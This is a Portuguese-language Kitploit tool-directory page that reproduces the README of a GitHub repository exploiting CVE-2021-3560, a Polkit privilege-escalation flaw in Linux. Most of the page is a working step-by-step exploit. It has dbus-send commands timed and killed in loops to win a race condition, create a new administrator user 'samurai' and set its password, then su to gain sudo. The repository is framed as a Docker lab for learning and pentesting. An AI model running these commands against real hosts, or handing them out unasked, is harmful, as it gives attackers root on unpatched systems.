Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-3560-Polkit-Privilege-Escalation — Exploit baseado em Docker para CVE-2021-3560 (escalonamento de privilégio Polkit) com instruções passo a passo para criar um usuário sudo via condição de corrida no dbus-send. | Kitploit
Ferramentas/GitHubGitHub/markyu0401/cve-2021-3560-polkit-privilege-escalation
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHubmarkyu0401/cve-2021-3560-polkit-privilege-escalation

CVE-2021-3560-Polkit-Privilege-Escalation

Exploit baseado em Docker para CVE-2021-3560 (escalonamento de privilégio Polkit) com instruções passo a passo para criar um usuário sudo via condição de corrida no dbus-send.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
1há 2 anosAinda não revisado

CVE-2021-3560-Polkit-Privilege-Escalation

por Mark, Qingchen Yu Para construir o container com

docker build -t <image tag of your choice> .

Para executar o container

docker run -it <image tag name>
  1. Comece com start.sh

  2. Meça o Tempo de Execução: Anote o tempo 'real' e calcule a metade dele.

    time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:samurai string:"Samurai" int32:1
    
  3. Crie um Usuário com Privilégios de Sudo: Substitua X.XXX pela metade do tempo 'real' acima, pois queremos que o processo seja interrompido no meio o comando será executado em um loop de 10000 vezes Talvez seja necessário executar esta etapa várias vezes

    for counter in {1..10000}; do dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:samurai string:"Samurai" int32:1 & sleep X.XXXs; kill $!;done
    
  4. Verifique a criação do usuário id samurai Deve mostrar que o usuário samurai existe e exibir suas permissões. Execute o passo 2 novamente se não.

  5. Gere o Hash da Senha: neste caso, a senha seria 'iamsamurai' Anote o hash gerado.

    openssl passwd -5 iamsamurai
    
  6. Defina a Senha para o Novo Usuário: Substitua X.XXX pela duração do sleep e Password Hash pelo hash do passo 4. Substitua UUUU pelo ID do usuário 'samurai'

    for counter in {1..10000}; do dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/UserUUUU org.freedesktop.Accounts.User.SetPassword string:'Password Hash' string:GoldenEye & sleep X.XXXs; kill $!;done
    
  7. Alterne para o novo usuário com a senha criada no passo 4. su - samurai

    Agora você deve ser capaz de usar 'sudo com este usuário'.

Baixar ferramenta